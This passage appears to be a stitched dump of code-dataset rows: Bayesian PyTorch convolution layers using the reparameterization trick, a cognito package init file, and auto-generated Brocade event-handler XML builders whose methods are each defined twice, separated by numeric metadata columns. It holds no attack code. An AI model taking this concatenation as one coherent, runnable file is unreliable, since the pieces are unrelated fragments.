self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv2d(input, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class Conv3dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
prior_mean,
prior_variance,
posterior_mu_init,
posterior_rho_init,
stride=1,
padding=0,
dilation=1,
groups=1,
bias=True):
"""
Implements Conv3d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(Conv3dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid out_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv3d(input, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class ConvTranspose1dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
output_padding=0,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements ConvTranspose1d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(ConvTranspose1dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid out_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(in_channels, out_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(in_channels, out_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(in_channels, out_channels // groups, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv_transpose1d(input, weight, bias, self.stride,
self.padding, self.output_padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class ConvTranspose2dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
output_padding=0,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements ConvTranspose2d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(ConvTranspose2dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid out_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv_transpose2d(input, weight, bias, self.stride,
self.padding, self.output_padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class ConvTranspose3dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
output_padding=0,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements ConvTranspose3d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(ConvTranspose3dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid out_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.output_padding = output_padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(in_channels, out_channels // groups, kernel_size,
kernel_size, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv_transpose3d(input, weight, bias, self.stride,
self.padding, self.output_padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
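# ---------------------------------------------------------------------------
# Usage sketch (illustrative, not part of the library API): every layer above
# returns (output, kl), so the KL terms feed the ELBO objective next to the
# usual data-fit term. The shapes and the `num_batches` scaling below are
# example assumptions, not values prescribed by this module.
if __name__ == "__main__":
    layer = Conv2dReparameterization(in_channels=3, out_channels=8,
                                     kernel_size=3, padding=1)
    x = torch.randn(4, 3, 32, 32)
    out, kl = layer(x)                  # out: [4, 8, 32, 32], kl: scalar
    nll = out.pow(2).mean()             # stand-in for a real likelihood term
    num_batches = 100                   # assumed, dataset-dependent constant
    loss = nll + kl / num_batches       # ELBO-style objective
    loss.backward()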
| 45.353774
| 148
| 0.620177
| 4,498
| 38,460
| 5.058693
| 0.060916
| 0.043509
| 0.042718
| 0.043509
| 0.896678
| 0.894568
| 0.894568
| 0.894568
| 0.892854
| 0.892854
| 0
| 0.007795
| 0.299558
| 38,460
| 847
| 149
| 45.40732
| 0.836854
| 0.245346
| 0
| 0.930464
| 0
| 0
| 0.04442
| 0.006072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.029801
| false
| 0
| 0.014901
| 0
| 0.06457
| 0.001656
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a3ffa7d49614bc9d04c0291edf6bc5dcc507c64
| 122
|
py
|
Python
|
cognito/__init__.py
|
vandana-11/cognito
|
4f92229511b265578def8e34d30575292070e584
|
[
"BSD-3-Clause"
] | 11
|
2020-01-27T13:30:44.000Z
|
2021-06-04T01:08:27.000Z
|
cognito/__init__.py
|
vandana-11/cognito
|
4f92229511b265578def8e34d30575292070e584
|
[
"BSD-3-Clause"
] | 25
|
2020-02-10T12:57:59.000Z
|
2020-05-09T18:17:58.000Z
|
cognito/__init__.py
|
vandana-11/cognito
|
4f92229511b265578def8e34d30575292070e584
|
[
"BSD-3-Clause"
] | 11
|
2020-01-24T13:17:20.000Z
|
2020-05-01T07:21:40.000Z
|
# -*- coding: utf-8 -*-
from cognito.core import *
from cognito.core.grid import Grid
from cognito.core.commands import *
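# With these package-level imports in place, consumers can (illustratively)
# import directly from the top-level package:
#
#   from cognito import Grid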
| 24.4
| 35
| 0.729508
| 18
| 122
| 4.944444
| 0.5
| 0.370787
| 0.505618
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009524
| 0.139344
| 122
| 4
| 36
| 30.5
| 0.838095
| 0.172131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4a4b93e29772162511ff0c1e9b8c74015e179808
| 8,398
|
py
|
Python
|
pynos/versions/ver_6/ver_6_0_1/yang/brocade_event_handler.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 12
|
2015-09-21T23:56:09.000Z
|
2018-03-30T04:35:32.000Z
|
pynos/versions/ver_6/ver_6_0_1/yang/brocade_event_handler.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 10
|
2016-09-15T19:03:27.000Z
|
2017-07-17T23:38:01.000Z
|
pynos/versions/ver_6/ver_6_0_1/yang/brocade_event_handler.py
|
bdeetz/pynos
|
bd8a34e98f322de3fc06750827d8bbc3a0c00380
|
[
"Apache-2.0"
] | 6
|
2015-08-14T08:05:23.000Z
|
2022-02-03T15:33:54.000Z
|
#!/usr/bin/env python
import xml.etree.ElementTree as ET
class brocade_event_handler(object):
"""Auto generated class.
"""
def __init__(self, **kwargs):
self._callback = kwargs.pop('callback')
def event_handler_event_handler_list_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name = ET.SubElement(event_handler_list, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id = ET.SubElement(trigger, "trigger-id")
trigger_id.text = kwargs.pop('trigger_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_vcs_vcs(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
vcs = ET.SubElement(trigger_choice, "vcs")
vcs = ET.SubElement(vcs, "vcs")
vcs.text = kwargs.pop('vcs')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_raslog_raslog(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
raslog = ET.SubElement(trigger_choice, "raslog")
raslog = ET.SubElement(raslog, "raslog")
raslog.text = kwargs.pop('raslog')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_action_action_choice_python_script_python_script(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
action = ET.SubElement(event_handler_list, "action")
action_choice = ET.SubElement(action, "action-choice")
python_script = ET.SubElement(action_choice, "python-script")
python_script = ET.SubElement(python_script, "python-script")
python_script.text = kwargs.pop('python_script')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_name(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name = ET.SubElement(event_handler_list, "name")
name.text = kwargs.pop('name')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_id(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id = ET.SubElement(trigger, "trigger-id")
trigger_id.text = kwargs.pop('trigger_id')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_vcs_vcs(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
vcs = ET.SubElement(trigger_choice, "vcs")
vcs = ET.SubElement(vcs, "vcs")
vcs.text = kwargs.pop('vcs')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_trigger_trigger_choice_raslog_raslog(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
trigger = ET.SubElement(event_handler_list, "trigger")
trigger_id_key = ET.SubElement(trigger, "trigger-id")
trigger_id_key.text = kwargs.pop('trigger_id')
trigger_choice = ET.SubElement(trigger, "trigger-choice")
raslog = ET.SubElement(trigger_choice, "raslog")
raslog = ET.SubElement(raslog, "raslog")
raslog.text = kwargs.pop('raslog')
callback = kwargs.pop('callback', self._callback)
return callback(config)
def event_handler_event_handler_list_action_action_choice_python_script_python_script(self, **kwargs):
"""Auto Generated Code
"""
config = ET.Element("config")
event_handler = ET.SubElement(config, "event-handler", xmlns="urn:brocade.com:mgmt:brocade-event-handler")
event_handler_list = ET.SubElement(event_handler, "event-handler-list")
name_key = ET.SubElement(event_handler_list, "name")
name_key.text = kwargs.pop('name')
action = ET.SubElement(event_handler_list, "action")
action_choice = ET.SubElement(action, "action-choice")
python_script = ET.SubElement(action_choice, "python-script")
python_script = ET.SubElement(python_script, "python-script")
python_script.text = kwargs.pop('python_script')
callback = kwargs.pop('callback', self._callback)
return callback(config)
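# Usage sketch (illustrative; within pynos the callback normally pushes the
# generated config to a NOS device). A stand-in callback that just serializes
# the XML lets the builder be exercised offline:
if __name__ == "__main__":
    handler = brocade_event_handler(callback=ET.tostring)
    print(handler.event_handler_event_handler_list_name(name="eh1"))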
| 47.988571
| 114
| 0.667421
| 995
| 8,398
| 5.392965
| 0.043216
| 0.221394
| 0.143123
| 0.134178
| 0.974283
| 0.974283
| 0.974283
| 0.974283
| 0.974283
| 0.974283
| 0
| 0
| 0.208264
| 8,398
| 175
| 115
| 47.988571
| 0.807039
| 0.040129
| 0
| 0.96875
| 1
| 0
| 0.168124
| 0.052461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085938
| false
| 0
| 0.007813
| 0
| 0.179688
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
4ab63af6f0861a0fe6bb9d7b84ed58cb771ae2c8
| 148
|
py
|
Python
|
tests/unit/multipolygon/conftest.py
|
phuntimes/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | 1
|
2020-11-26T05:58:23.000Z
|
2020-11-26T05:58:23.000Z
|
tests/unit/multipolygon/conftest.py
|
Sean-McVeigh/mongoshapes
|
f461c67343c32c6b97af8d67a269b4de492d1d71
|
[
"MIT"
] | null | null | null |
tests/unit/multipolygon/conftest.py
